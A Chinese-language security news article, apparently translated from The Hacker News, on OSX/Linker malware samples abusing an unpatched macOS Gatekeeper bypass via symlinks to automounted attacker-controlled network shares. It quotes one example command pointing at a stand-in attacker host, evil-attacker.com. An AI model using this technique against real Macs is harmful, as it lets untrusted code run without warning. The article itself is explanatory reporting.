苹果用户请注意!又一漏洞被曝光

      苹果用户请注意!又一漏洞被曝光无评论

来自Intego的网络安全研究人员称:苹果macOS Gatekeeper安全功能细节和PoC中一个未修补的安全漏洞可能会被积极利用。

Intego团队在VirusTotal上发现了四个新的macOS恶意软件样本,它们利用GateKeeper绕过漏洞,在macOS上执行不可信代码。这个新发现的恶意软件,被称为OSX/Linker,到目前为止还没有在野外发现过。虽然这些示例利用了未修补的Gatekeeper旁路漏洞,但它不会从攻击者的服务器下载任何恶意应用程序。

 

其中一个文件是用苹果开发人员ID(如下文所述)签署的,很明显,OSX/链接器磁盘映像是OSX/Surfbuyer广告软件开发人员手工制作的。由于恶意软件样本链接到一个远程服务器,从那里下载不受信任的应用程序,攻击者也可以将相同的样本分发到真正的目标,只需在他们的服务器上用一个恶意软件应用程序替换已定义的样本应用程序。

 

macOS网关守卫绕过漏洞

GateKeeper是苹果macOS内置的一项安全功能,可以强制执行代码签名,并在下载的应用程序运行前进行验证,帮助用户保护自己的系统免受恶意软件和其他恶意软件的攻击。

这意味着,如果你从互联网上下载一个应用程序,GateKeeper只会允许它在没有任何警告的情况下执行,前提是它已经用苹果公司签发的有效证书进行了签名,否则会提示你允许或拒绝执行。

 

然而,Gatekeeper被设计成将外部驱动器(USB或HDD)和网络共享都视为“安全位置”,用户可以在这里运行任何应用程序,而不需要检查和提示。

 

上个月末,独立安全研究员菲利波卡瓦拉林(Filippo Cavallarin)公开披露了一种利用这种行为的方法,将其与macOS操作系统的另外两个合法特性结合起来,这两个特性是:zip归档文件可以包含指向任意位置的符号链接,包括automount端点和macOS上的自动挂载功能可以自动挂载远程服务器上的网络共享,只需访问它的“特殊”路径,即。,以“/net/”开头。

 

“例如,ls /net/evil-attacker.com/sharedfolder/将使操作系统使用NFS读取远程主机(evil-attacker.com)上的'sharedfolder'的内容,”Cavallarin在博客中解释说。

 

Cavallarin创建了一个ZIP文件,其中包含一个符号链接,指向macOS将自动加载的攻击者控制的网络共享。一旦受害者打开ZIP归档文件并跟随链接,他将导航到由攻击者控制的网络共享,该网络共享受到Gatekeeper的信任,在没有任何警告的情况下欺骗受害者运行恶意的可执行文件。“Finder的设计方式(例如隐藏。app扩展名,从标题栏隐藏完整路径)使得这项技术非常有效,而且很难被发现,”研究人员说。

 

然而,新发现的恶意软件样本不是ZIP文件,而是磁盘映像文件(带有.dmg),这表明“恶意软件制造商正在进行实验,看看Cavallarin的漏洞是否也适用于磁盘映像。”

 

文章来源:https://thehackernews.com/2019/06/macos-malware-gatekeeper.html

发表评论